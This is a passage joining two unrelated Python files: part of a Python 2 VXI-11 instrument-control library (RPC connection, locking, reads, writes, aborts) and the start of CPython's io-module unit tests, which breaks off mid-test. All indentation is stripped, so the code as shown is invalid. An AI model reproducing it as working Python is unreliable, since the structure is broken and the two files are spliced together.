def __repr__(self):
if self.other_info:
return self.message+": "+str(self.other_info)
else:
return self.message
def __str__(self):
return self.__repr__()
class VXI_11_Device_Not_Connected(VXI_11_Error):
def __init__(self):
VXI_11_Error.__init__(self,'notconnected')
class VXI_11_Device_Not_Locked(VXI_11_Error):
pass
class VXI_11_Transient_Error(VXI_11_Error): #exceptions having to do with multiple use which might get better
pass
class VXI_11_Timeout(VXI_11_Transient_Error):
pass
class VXI_11_Locked_Elsewhere(VXI_11_Transient_Error):
pass
class VXI_11_Stream_Sync_Lost(VXI_11_Transient_Error):
def __init__(self, code, bytes):
VXI_11_Transient_Error.__init__(self, code)
self.other_info="bytes vacuumed = %d" % bytes
class VXI_11_RPC_EOF(VXI_11_Transient_Error):
pass
_VXI_11_enumerated_exceptions={ #common, correctable exceptions
15:VXI_11_Timeout,
11:VXI_11_Locked_Elsewhere,
12:VXI_11_Device_Not_Locked
}
class vxi_11_connection:
"""vxi_11_connection implements handling of devices compliant with vxi11.1-vxi11.3 protocols, with which
the user should have some familiarity"""
debug_info=0
debug_error=1
debug_warning=2
debug_all=3
debug_level=debug_error
OneWayAbort=0 #by default, this class uses two-way aborts, per official vxi-11 standard
def _list_packer(self, args):
l=map(None, self.pack_type_list, args) # combine lists
for packer, data in l:
packer(data)
def _list_unpacker(self):
return [func() for func in self.unpack_type_list]
def _link_xdr_defs(self, channel):
"self.link_xdr_defs() creates dictionaries of functions for packing and unpacking the various data types"
p=channel.packer
u=channel.unpacker
xdr_packer_defs={
"write": (p.pack_int, p.pack_int, p.pack_int, p.pack_int, p.pack_opaque),
"read": (p.pack_int, p.pack_int, p.pack_int, p.pack_int, p.pack_int, p.pack_int),
"create_link": (p.pack_int, p.pack_bool, p.pack_uint, p.pack_string),
"generic": (p.pack_int, p.pack_int, p.pack_int, p.pack_int),
"lock": (p.pack_int, p.pack_int, p.pack_int),
"id": (p.pack_int,)
}
xdr_unpacker_defs={
"write": (u.unpack_int, u.unpack_int),
"read": (u.unpack_int, u.unpack_int, u.unpack_opaque),
"create_link": (u.unpack_int, u.unpack_int, u.unpack_uint, u.unpack_uint),
"read_stb":(u.unpack_int, u.unpack_int),
"error": (u.unpack_int,)
}
return xdr_packer_defs, xdr_unpacker_defs
def _setup_core_packing(self, pack, unpack):
self.pack_type_list, self.unpack_type_list=self._core_packers[pack],self._core_unpackers[unpack]
def post_init(self):
pass
def simple_log_error(self, message, level=debug_error, file=None):
if level <= self.debug_level:
if file is None:
file=sys.stderr
print >> file, self.device_name, message
def fancy_log_error(self, message, level=debug_error, file=None):
if level <= self.debug_level:
message=str(message).strip()
level_str=("**INFO*****", "**ERROR****", "**WARNING**", "**DEBUG****")[level]
if file is None:
file=sys.stderr
print >> file, time.asctime().strip(), '\t', level_str, '\t', self.shortname, '\t', \
message.replace('\n','\n\t** ').replace('\r','\n\t** ')
def log_error(self, message, level=debug_error, file=None):
"override log_error() for sending messages to special places or formatting differently"
self.fancy_log_error(message, level, file)
def log_traceback(self, main_message='', file=None):
exlist=traceback.format_exception(*sys.exc_info())
s=main_message+'\n'
for i in exlist:
s=s+i
self.log_error(s, self.debug_error, file)
def log_info(self, message, file=None):
self.log_error(message, self.debug_info, file)
def log_warning(self, message, file=None):
self.log_error(message, self.debug_warning, file)
def log_debug(self, message, file=None):
self.log_error(message, self.debug_all, file)
def log_exception(self, main_message='', file=None):
self.log_error(main_message+traceback.format_exception_only(*(sys.exc_info()[:2]))[0], self.debug_error, file)
def __init__(self, host='127.0.0.1', device="inst0", timeout=1000, raise_on_err=None, device_name="Network Device", shortname=None,
portmap_proxy_host=None, portmap_proxy_port=rpc.PMAP_PORT):
self.raise_on_err=raise_on_err
self.lid=None
self.timeout=timeout
self.device_name=device_name
self.device_sicl_name=device
self.host=host
self.portmap_proxy_host=portmap_proxy_host
self.portmap_proxy_port=portmap_proxy_port
self.core=None
self.abortChannel=None
self.mux=None #default is no multiplexer active
if shortname is None:
self.shortname=device_name.strip().replace(' ','').replace('\t','')
else:
self.shortname=shortname.strip().replace(' ','').replace('\t','')
if threads:
self.threadlock=threading.RLock()
try:
self.reconnect()
except VXI_11_Transient_Error:
self.log_exception("Initial connect failed... retry later")
def setup_mux(self, mux=None, global_name=None):
self.mux=mux
self.global_mux_name=global_name
def command(self, id, pack, unpack, arglist, ignore_connect=0):
if not (ignore_connect or self.connected):
raise VXI_11_Device_Not_Connected
self._setup_core_packing(pack, unpack)
try:
result= self.core.make_call(id, arglist, self._list_packer, self._list_unpacker)
except (RuntimeError, EOFError):
#RuntimeError is thrown by recvfrag if the xid is off... it means we lost data in the pipe
#EOFError is thrown if the packet isn't full length, as usually happens when ther is garbage in the pipe read as a length
#so vacuum out the socket, and raise a transient error
rlist=1
ntotal=0
while(rlist):
rlist, wlist, xlist=select.select([self.core.sock],[],[], 1.0)
if rlist:
ntotal+=len(self.core.sock.recv(10000) )#get some data from it
raise VXI_11_Stream_Sync_Lost("sync", ntotal)
err=result[0]
if err and self.raise_on_err:
e=_VXI_11_enumerated_exceptions #common, correctable exceptions
if e.has_key(err):
raise e[err](err) #raise these exceptions explicitly
else:
raise VXI_11_Error(err) #raise generic VXI_11 exception
return result
def do_timeouts(self, timeout, lock_timeout, channel=None):
if channel is None:
channel=self.core
flags=0
if timeout is None:
timeout=self.timeout
if not lock_timeout and hasattr(self,"default_lock_timeout"):
lock_timeout=self.default_lock_timeout
if lock_timeout:
flags |= 1 # append waitlock bit
if channel:
channel.select_timeout_seconds=1.5*max(timeout, lock_timeout)/1000.0 #convert ms to sec, and be generous on hard timeout
return flags, timeout, lock_timeout
def reconnect(self): #recreate a broken connection
"""reconnect() creates or recreates our main connection. Useful in __init__ and in complete communications breakdowns.
If it throws a VXI_11_Transient_Error, the connection exists, but the check_idn() handshake or post_init() failed."""
self.connected=0
if self.core:
self.core.close() #if this is a reconnect, break old connection the hard way
if self.abortChannel:
self.abortChannel.close()
self.core=rpc.TCPClient(self.host, 395183, 1,
portmap_proxy_host=self.portmap_proxy_host,
portmap_proxy_port=self.portmap_proxy_port)
self._core_packers, self._core_unpackers=self._link_xdr_defs(self.core) #construct xdr data type definitions for the core
err, self.lid, self.abortPort, self.maxRecvSize=self.command(
10, "create_link","create_link", (0, 0, self.timeout, self.device_sicl_name), ignore_connect=1) #execute create_link
if err: #at this stage, we always raise exceptions since there isn't any way to bail out or retry reasonably
raise VXI_11_Error(err)
self.maxRecvSize=min(self.maxRecvSize, 1048576) #never transfer more than 1MB at a shot
if self.OneWayAbort:
#self.abort_channel=OneWayAbortClient(self.host, 395184, 1, self.abortPort)
self.abort_channel=rpc.RawUDPClient(self.host, 395184, 1, self.abortPort)
else:
self.abort_channel=RawTCPClient(self.host, 395184, 1, self.abortPort)
connection_dict[self.lid]=(self.device_name, weakref.ref(self))
self.locklevel=0
self.connected=1
self.check_idn()
self.post_init()
def abort(self):
self.abort_channel.select_timeout_seconds=self.timeout/1000.0 #convert to seconds
try:
err=self.abort_channel.make_call(1, self.lid, self.abort_channel.packer.pack_int, self.abort_channel.unpacker.unpack_int) #abort
except EOFError:
raise VXI_11_RPC_EOF("eof")
if err and self.raise_on_err:
raise VXI_11_Error( err)
return err
def disconnect(self):
if self.connected:
try:
err, =self.command(23, "id", "error", (self.lid,)) #execute destroy_link
except:
self.log_traceback() #if we can't close nicely, we'll close anyway
self.connected=0
del connection_dict[self.lid]
self.lid=None
self.core.close()
self.abort_channel.close()
del self.core, self.abort_channel
self.core=None
self.abortChannel=None
def __del__(self):
if self.lid is not None:
self.raise_on_err=0 #no exceptions here from simple errors
try:
self.abort()
except VXI_11_Error:
pass
try:
self.disconnect()
except VXI_11_Error:
pass
def write(self, data, timeout=None, lock_timeout=0):
"""err, bytes_sent=write(data [, timeout] [,lock_timeout]) sends data to device. See do_timeouts() for
semantics of timeout and lock_timeout"""
flags, timeout, lock_timeout=self.do_timeouts(timeout, lock_timeout)
base=0
end=len(data)
while base<end:
n=end-base
if n>self.maxRecvSize:
xfer=self.maxRecvSize
else:
xfer=n
flags |= 8 #write end on last byte
err, count=self.command(11, "write", "write", (self.lid, timeout, lock_timeout, flags, data[base:base+xfer]))
if err: break
base+=count
return err, base
def read(self, timeout=None, lock_timeout=0, count=None, termChar=None):
"""err, reason, result=read([timeout] [,lock_timeout] [,count] [,termChar]) reads up to count bytes from the device,
ending on count, EOI or termChar (if specified). See do_timeouts() for semantics of the timeouts."""
flags, timeout, lock_timeout=self.do_timeouts(timeout, lock_timeout)
if termChar is not None:
flags |= 128 # append termchrset bit
act_term=termChar
else:
act_term=0
accumdata=""
reason=0
err=0
accumlen=0
while ( (not err) and (not (reason & 4) ) and
( (count is None) or (accumlen < count)) and
( (termChar is None) or (accumdata[-1] != termChar)) ): #wait for END flag or count or matching terminator char
readcount=self.maxRecvSize/2
if count is not None:
readcount=min(readcount, count-accumlen)
err, reason, data = self.command(12, "read","read", (self.lid, readcount, timeout, lock_timeout, flags, act_term))
accumdata+=data
accumlen+=len(data)
#print err, reason, len(data), len(accumdata)
return err, reason, accumdata
def generic(self, code, timeout, lock_timeout):
flags, timeout, lock_timeout=self.do_timeouts(timeout, lock_timeout)
err, = self.command(code, "generic", "error", (self.lid, flags, timeout, lock_timeout))
return err
def trigger(self, timeout=None, lock_timeout=0):
return self.generic(14, timeout, lock_timeout)
def clear(self, timeout=None, lock_timeout=0):
return self.generic(15, timeout, lock_timeout)
def remote(self, timeout=None, lock_timeout=0):
return self.generic(16, timeout, lock_timeout)
def local(self, timeout=None, lock_timeout=0):
return self.generic(17, timeout, lock_timeout)
def read_status_byte(self, timeout=None, lock_timeout=0):
flags, timeout, lock_timeout=self.do_timeouts(timeout, lock_timeout)
err, status = self.command(13, "generic","read_stb", (self.lid, flags, timeout, lock_timeout))
return err, status
def lock(self, lock_timeout=0):
"lock() acquires a lock on a device and the threadlock. If it fails it leaves the connection cleanly unlocked"
err=0
if threads:
self.threadlock.acquire()
if self.locklevel==0:
flags, timeout, lock_timeout=self.do_timeouts(0, lock_timeout)
try:
if self.mux: self.mux.lock_connection(self.global_mux_name)
try:
err, = self.command(18, "lock","error", (self.lid, flags, lock_timeout))
except:
if self.mux: self.mux.unlock_connection(self.global_mux_name)
raise
except:
if threads:
self.threadlock.release()
raise
if err:
if threads:
self.threadlock.release()
else:
self.locklevel+=1
return err
def is_locked(self):
return self.locklevel > 0
def unlock(self, priority=0):
"""unlock(priority=0) unwinds one level of locking, and if the level is zero, really unlocks the device.
Calls to lock() and unlock() should be matched. If there is a danger that they are not, due to bad
exception handling, unlock_completely() should be used as a final cleanup for a series of operations.
Setting priority to non-zero will bias the apparent last-used time in a multiplexer (if one is used),
so setting priority to -10 will effectively mark this channel least-recently-used, while setting it to
+2 will post-date the last-used time 2 seconds, so for the next 2 seconds, the device will be hard to kick
out of the channel cache (but not impossible).
"""
self.locklevel-=1
assert self.locklevel>=0, "Too many unlocks on device: "+self.device_name
err=0
try:
if self.locklevel==0:
try:
err, = self.command(19, "id", "error", (self.lid, ))
finally:
if self.mux:
self.mux.unlock_connection(self.global_mux_name, priority) #this cannot fail, no try needed (??)
elif priority and self.mux:
#even on a non-final unlock, a request for changed priority is always remembered
self.mux.adjust_priority(self.global_mux_name, priority)
finally:
if threads:
self.threadlock.release()
return err
def unlock_completely(self, priority=0):
"unlock_completely() forces an unwind of any locks all the way back to zero for error cleanup. Only exceptions thrown are fatal."
if threads:
self.threadlock.acquire() #make sure we have the threadlock before we try a (possibly failing) full lock
try:
self.lock() #just to be safe, we should already hold one level of lock!
except VXI_11_Locked_Elsewhere:
pass #this is often called on error cleanup when we don't already have a lock, and we don't really care if we can't get it
except VXI_11_Error:
self.log_exception("Unexpected trouble locking in unlock_completely(): ")
if threads:
self.threadlock._RLock__count += (1-self.threadlock._RLock__count)
#unwind to single lock the fast way, and make sure this variable really existed, to shield against internal changes
self.locklevel=1 #unwind our own counter, too
try:
self.unlock(priority)
except VXI_11_Device_Not_Locked:
pass #if we couldn't lock above, we will probably get another exception here, and don't care
except VXI_11_Transient_Error:
self.log_exception("Unexpected trouble unlocking in unlock_completely(): ")
except VXI_11_Error:
self.log_exception("Unexpected trouble unlocking in unlock_completely(): ")
raise
def transaction(self, data, count=None, lock_timeout=0):
"""err, reason, result=transaction(data, [, count] [,lock_timeout]) sends data and waits for a response.
It is guaranteed to leave the lock level at its original value on exit,
unless KeyboardInterrupt breaks the normal flow. If count isn't provided, there is no limit to how much data will be accepted.
See do_timeouts() for semantics on lock_timeout."""
self.lock(lock_timeout)
reason=None
result=None
try:
err, write_count = self.write(data)
if not err:
err, reason, result = self.read(count=count)
finally:
self.unlock()
return err, reason, result
def check_idn(self):
'check_idn() executes "*idn?" and aborts if the result does not start with self.idn_head'
if hasattr(self,"idn"):
return #already done
if hasattr(self,"idn_head") and self.idn_head is not None:
self.lock()
try:
self.clear()
err, reason, idn = self.transaction("*idn?")
finally:
self.unlock()
check=idn.find(self.idn_head)
self.idn=idn.strip() #save for future reference info
if check:
self.disconnect()
assert check==0, "Wrong device type! expecting: "+self.idn_head+"... got: "+self.idn
else:
self.idn="Device *idn? not checked!"
import copy
class device_thread:
Thread=threading.Thread #by default, use canonical threads
def __init__(self, connection, main_sleep=1.0, name="Device"):
self.running=0
self.main_sleep=main_sleep
self.__thread=None
self.__name=copy.copy(name) #make a new copy to avoid a possible circular reference
self.__wait_event=threading.Event()
self.set_connection(connection)
def set_connection(self, connection):
#keep only a weak reference, so the thread cannot prevent the device from being deleted
#such deletion creates an error when the thread tries to run, but that's OK
#this allows the device_thread to be used as a clean mix-in class to a vxi_11 connection
self.__weak_connection=weakref.ref(connection)
def connection(self):
return self.__weak_connection() #dereference weak reference
def handle_lock_error(self):
"handle_lock_error can be overridden to count failures and do something if there are too many"
self.connection().log_exception(self.name+": Error while locking device")
def onepass(self):
connection=self.connection()
try:
connection.lock()
except VXI_11_Transient_Error:
self.handle_lock_error()
return
try:
self.get_data()
except:
connection.log_traceback('Uncaught exception in get_data()')
try:
connection.clear()
except:
connection.log_exception('failed to clear connection after error')
self.run=0
connection.unlock()
def monitor(self):
self.connection().log_info("Monitor loop entered")
while(self.run):
try:
self.onepass()
self.__wait_event.wait(self.main_sleep) #wait until timeout or we are cancelled
except KeyboardInterrupt:
self.connection().log_error("Keyboard Interrupt... terminating")
self.run=0
except:
self.connection().log_traceback()
self.run=0
self.running=0
self.connection().unlock_completely()
def run_thread(self):
if not self.running: #if it's already running, just keep it up.
self.run=1
self.__thread=self.Thread(target=self.monitor, name=self.__name)
self.__wait_event.clear() #make sure we don't fall through immediately
self.__thread.start()
self.running=1
def get_monitor_thread(self):
return self.__thread
def stop_thread(self):
if self.running:
self.run=0
self.__wait_event.set() #cancel any waiting
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
